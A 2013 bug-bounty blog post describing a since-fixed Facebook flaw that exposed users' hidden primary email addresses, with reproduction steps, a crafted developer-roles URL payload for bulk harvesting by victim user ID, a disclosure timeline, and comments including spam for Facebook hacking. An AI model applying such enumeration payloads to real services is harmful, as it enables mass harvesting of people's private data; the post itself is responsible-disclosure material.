Saturday, July 20, 2013

How I Exposed your Primary Facebook Email Address (Bug worth $4500)



Hi, For this post, I’ll be talking about how I disclose the Private Primary Email Address of any Facebook Account. With no user interaction. Enjoy.


This bug was reported to Facebook Security Team, fixed immediately

Last month, I found a vulnerability in Facebook Developer Application Roles Page which allowed me to disclose the primary Facebook email address even if the victim set the email address privacy to "Only Me"

Steps to Reproduce

1. Grab profile links of all facebook users from Facebook People Directory i.e http://www.facebook.com/directory/people/
2. Collect Numerical Facebook ID for each Profile from facebook Graph API i.e http://graph.facebook.com/sdfsdfsdafd.sdfdsafsdfds where extracted user ID is 100006240120652
3. Block victim Facebook Account
4. Create Facebook Application -> Go to Settings -> Developer Roles 
5. Final payload for this vulnerability looks like this:

https://developers.facebook.com/apps/APPLICATION_ID/roles?unverified_groups[1][0]=VICTIM_UID


Nevertheless, you can obtain multiple email address by adding more parameters


https://developers.facebook.com/apps/APPLICATION_ID/roles
?unverified_groups[1][0]=VICTIM_UID1
&unverified_groups[2][0]=VICTIM_UID2
&unverified_groups[3][0]=VICTIM_UID3
&unverified_groups[4][0]=VICTIM_UID4
&unverified_groups[5][0]=VICTIM_UID5
&unverified_groups[6][0]=VICTIM_UID6
&unverified_groups[7][0]=VICTIM_UID7
&unverified_groups[8][0]=VICTIM_UID8
&unverified_groups[9][0]=VICTIM_UID9
&unverified_groups[10][0]=VICTIM_UID10

and so forth...



Dumping Like a Boss ;)

Just reported this issue and one hour later Facebook Security Team response my initial report



LoL! ;)

At exactly 8:26AM the vulnerability was finally fixed



Final fix: 5 hours after initial report


Facebook was pretty fast to address this issue and resolved this within hours. Facebook Security team awarded this bug with $4500.






Facebook WhiteHat Card, baby!


I appreciate the opportunity to preserve my skills and gain some more experience. Thank you Facebook security team.

"Roy Castillo" - Facebook White Hat Page 2012 & 2013

- https://www.facebook.com/whitehat/thanks/


ProtipFocus on your target, think creative, use your imagination, don't spend your time on attacks like reflected XSS etc. try to find something special ;)


Disclosure Timeline

June 25th, 2013 at 1:22AM (GMT +08:00): Vulnerability Discovered
June 28th, 2013 at 2:43AM (GMT +08:00): Initial Report
June 28th, 2013 at 2:44AM (GMT +08:00): Autorespose from Security bot
June 28th, 2013 at 3:41AM (GMT +08:00): First response from Security Team
June 28th, 2013 at 8:26AM (GMT +08:00): Vulnerability Fixed
July 6th, 2013 at 1:40AM (GMT +08:00): Confirmation of Rory that the vulnerability has been fixed
July 19th, 2013 at 1:08AM (GMT +08:00): Bounty awarded
July 21st, 2013 at 12:00NN (GMT +08:00): Full Disclosure Published


Save The Planet!

16 comments:

  1. But this is possible to obtain from yahoo import user list , too , nah?

    BTW , nice finding ;)

    ReplyDelete
  2. Congrate! .. like A Boss !! ;hehhe

    ReplyDelete
  3. Hey dt live feed thing is good.. i put on my blog also.. And awesome nice bug u got on fb..
    Congratz...

    ReplyDelete
  4. Nice post man, I disagree with the Pro Tip, but well done.

    ReplyDelete
  5. hmm... fixed bug, it's not good hahaha

    ReplyDelete
  6. Amazing work pals, I really enjoy reading your interesting blogs. piratage facebook

    ReplyDelete
  7. Thumbs up guys you are really carrying out a great job.
    hacker un compte facebook

    ReplyDelete
  8. Waooow!!! Really very cool site of blogs. You can imagine what you have done for me.how to increase facebook likes

    ReplyDelete